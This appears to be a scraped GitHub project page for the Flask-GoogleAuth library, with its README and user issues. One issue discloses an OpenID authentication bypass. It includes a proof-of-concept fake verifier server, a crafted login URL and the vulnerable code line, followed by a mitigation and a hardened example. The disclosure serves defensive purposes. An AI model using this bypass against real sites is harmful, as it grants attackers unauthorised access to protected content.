
flask-googleauth's Introduction

Flask-GoogleAuth

This is a partial port of tornado.auth to be used with Flask.

It is small, self contained and does not use any filesystem operations. Great for internal apps.

Written by Alexander Saltanov, inspired by Kenneth Reitz.

You can buy me a cup of coffee or a glass of wine. Bitcoin could be sent to 1Boahzk5jMTebqiKVESzbnVWTvBTGnAvYf

Warning

I no longer use Flask and almost don't use Python, so I don't really know whether this code is still relevant or not.

This repository is to be removed completely in December 2017.

flask-googleauth's People

Contributors

martey, poiati, sashka, tschieggm, zimathias


flask-googleauth's Issues

Error getting g.user.name and g.user.email, why?

With debug mode, after logging in successfully, my browser shows this:

AttributeError
AttributeError: 'dict' object has no attribute 'name'

Traceback (most recent call last)
File "/usr/local/lib/python2.7/dist-packages/Flask-0.10.1-py2.7.egg/flask/app.py", line 1836, in __call__
return self.wsgi_app(environ, start_response)
File "/usr/local/lib/python2.7/dist-packages/Flask-0.10.1-py2.7.egg/flask/app.py", line 1820, in wsgi_app
response = self.make_response(self.handle_exception(e))
File "/usr/local/lib/python2.7/dist-packages/Flask-0.10.1-py2.7.egg/flask/app.py", line 1403, in handle_exception
reraise(exc_type, exc_value, tb)
File "/usr/local/lib/python2.7/dist-packages/Flask-0.10.1-py2.7.egg/flask/app.py", line 1817, in wsgi_app
response = self.full_dispatch_request()
File "/usr/local/lib/python2.7/dist-packages/Flask-0.10.1-py2.7.egg/flask/app.py", line 1477, in full_dispatch_request
rv = self.handle_user_exception(e)
File "/usr/local/lib/python2.7/dist-packages/Flask-0.10.1-py2.7.egg/flask/app.py", line 1381, in handle_user_exception
reraise(exc_type, exc_value, tb)
File "/usr/local/lib/python2.7/dist-packages/Flask-0.10.1-py2.7.egg/flask/app.py", line 1475, in full_dispatch_request
rv = self.dispatch_request()
File "/usr/local/lib/python2.7/dist-packages/Flask-0.10.1-py2.7.egg/flask/app.py", line 1461, in dispatch_request
return self.view_functions[rule.endpoint](**req.view_args)
File "/usr/local/lib/python2.7/dist-packages/Flask_GoogleAuth-0.4-py2.7.egg/flask_googleauth.py", line 271, in decorated
return fn(*args, **kwargs)
File "/home/suyadi/projects/Flask-Resrfull/google.py", line 16, in secret
return "You have rights to be here, %s (%s)" % (g.user.name, g.user.email)
AttributeError: 'dict' object has no attribute 'name'

ok

good, but I hope it will support many APIs

Latest version unreleased

The master branch is not released on PyPI. Is it intentional or an oversight?

I would really like to get the force_auth_on_every_request functionality.

Does this package support Python 3?

On 19 February 2017, Python 3 will be 3,000 days old! We are interested to see if we can get at least 50% of the Top 5,000 PyPI packages to be compatible with Python 3 by that date. We are really close and, given that this package is in the PyPI Top 5,000, we seek your assistance in pushing us over that threshold.

So, if this package already supports Python 3 then please consider adding an appropriate trove classifier "Programming Language :: Python :: 3" to this package's PyPI page so that tools can automatically determine its Python 3 compatibility.

Specially crafted URL allows for bypassing OpenID authentication.

Summary

flask-googleauth uses openid.op_endpoint directly from the query arguments. This allows a malicious user to bypass the openid auth phase.

Steps to reproduce

Using flask-googleauth we can create a simple service such as:

from flask import Flask
from flask_googleauth import GoogleFederated

app = Flask(__name__)
auth = GoogleFederated("example.com", app)

@app.route('/')
@auth.required
def index():
    return 'Privileged content'

if __name__ == '__main__':
    app.run(host='0.0.0.0', debug = True)

We will serve this from localhost:5000

We can set up a server somewhere running

from flask import Flask
app = Flask(__name__)

@app.route('/', methods=['POST'])
def authcheck():
    return 'is_valid:true'

app.run(host='0.0.0.0', port = 5001)

We will serve this from localhost:5001

Now we can access http://localhost:5000/login/?openid.mode=id_res&openid.op_endpoint=http%3A%2F%2Flocalhost%3A5001%2F&openid.claimed_id=exam and be presented with 'Privileged content'.

Analysis

This works because:

  1. openid.mode is set (value not important):
     if request.args.get("openid.mode", None):
  2. openid.op_endpoint is accepted directly from the query arguments, allowing us to hijack the request:
     url = request.args.get("openid.op_endpoint", self._OPENID_ENDPOINT)
  3. We supply some value for some part of the user structure (so it is non-empty).

Mitigation

Don't use openid.op_endpoint.
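The endpoint-selection step this report is about, written both ways, as an added example that is not flask-googleauth's own code. TRUSTED_OP_ENDPOINT, the function names and the `post` callback are hypothetical; the attacker arguments are constructed from the URL in the report above.

```python
# Added example, not the library's code. TRUSTED_OP_ENDPOINT is a placeholder
# for whatever provider endpoint the application is configured with.
TRUSTED_OP_ENDPOINT = "https://openid.example/op"

# Constructed from the query string in the report: the parsed arguments of the
# crafted /login/ request, with op_endpoint pointing at the fake verifier.
ATTACK_ARGS = {
    "openid.mode": "id_res",
    "openid.op_endpoint": "http://localhost:5001/",
    "openid.claimed_id": "exam",
}


def endpoint_vulnerable(args, default=TRUSTED_OP_ENDPOINT):
    """Reported behaviour: the request's own query string decides which
    server is asked whether the assertion is valid."""
    return args.get("openid.op_endpoint", default)


def endpoint_hardened(args, trusted=TRUSTED_OP_ENDPOINT):
    """Pin verification to the configured provider. A response that names
    any other op_endpoint is treated as forged and rejected (None)."""
    claimed = args.get("openid.op_endpoint")
    if claimed is not None and claimed != trusted:
        return None
    return trusted


def parse_kv_response(body):
    """OpenID key-value response format: one 'key:value' per line. The fake
    verifier in the report answers exactly 'is_valid:true' in this form."""
    pairs = (line.split(":", 1) for line in body.splitlines() if ":" in line)
    return {k.strip(): v.strip() for k, v in pairs}


def assertion_is_valid(args, post, trusted=TRUSTED_OP_ENDPOINT):
    """Hardened check_authentication round trip. `post(url, fields)` does the
    HTTP POST and returns the body; it is injected so this runs offline."""
    if args.get("openid.mode") != "id_res":
        return False
    url = endpoint_hardened(args, trusted)
    if url is None:
        return False  # never contact a verifier chosen by the client
    fields = dict(args, **{"openid.mode": "check_authentication"})
    return parse_kv_response(post(url, fields)).get("is_valid") == "true"
```

With the crafted arguments the vulnerable selector returns the attacker's localhost:5001 verifier, while the hardened path refuses before any request is sent.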

Support for reverse proxies

If running a Flask app behind Nginx, the redirect URL is incorrect since it is using the localhost URL instead of the URL Nginx is responding to. Perhaps just adding a setting to specify the domain for the redirect.
